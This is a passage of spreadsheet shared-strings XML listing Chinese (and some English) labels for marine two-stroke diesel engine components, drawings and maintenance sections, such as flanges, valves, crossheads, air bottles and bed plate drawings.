  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>碳环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰，粗加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护罩的裂缝调整环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>桨毂和叶片组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管套毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油漆详细说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形保护罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>望远镜管总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧凑轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓固定</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管式出水口预热器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>EL ER/ECR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑块附重</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油伴行加热管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维护保养周期表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电线标号</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白炽灯泡清洗液</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+B95</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电源分析器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标签黏合剂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>振动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组装装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>箱装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>封面</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维护保养</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管理员</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驾驶台控制主机重启动，慢启动，前进</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重油预热</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> -</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>提前喷射</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>性能评估</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>一般操作</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>性能观察</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>错误指示表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>最大排烟压力的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ISO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>修正</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷凝水量计算</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑块和滑轨</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>往复部件数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>线缆连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓和螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头工具板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶盖密封安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具等</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钳子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>脚套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤油器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查和清洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内管和软管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绿卡</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷凝量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞，连杆和缸套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷凝空气布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>到扫气箱的扩压管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷凝</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>5049716</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>‐</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>0.0</t>
    </r>
  </si>
  <si>
    <r>
      <t>WELD</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>‐</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ON FLANGES</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>针阀偶件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油喷嘴毛坯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥控设备</t>
    </r>
  </si>
  <si>
    <r>
      <t>10K</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盲法兰</t>
    </r>
  </si>
  <si>
    <r>
      <t>30K</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三通阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>四通阀</t>
    </r>
  </si>
  <si>
    <r>
      <t>5K</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盲法兰</t>
    </r>
  </si>
  <si>
    <r>
      <t>5K</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减震器壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减震器燃油装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整衬垫</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气压缩机</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器水管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀空气弹簧气缸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气气缸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气干燥单元</t>
    </r>
  </si>
  <si>
    <r>
      <t>AIR DUCT (LOWER)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1/4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4/4</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱体（下部）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气阻流板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀空气弹簧活塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>透气阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气瓶装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气瓶接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气瓶阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气瓶组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器透气和泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>透气旋塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电气布置图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力开关布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却装置装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部支撑装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸安全阀装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑油管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气控制管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动停止阀装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机泄放管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机球轴承</t>
    </r>
  </si>
  <si>
    <r>
      <t>BED PLATE 1/3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>3/3</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座钻孔图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卡套接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
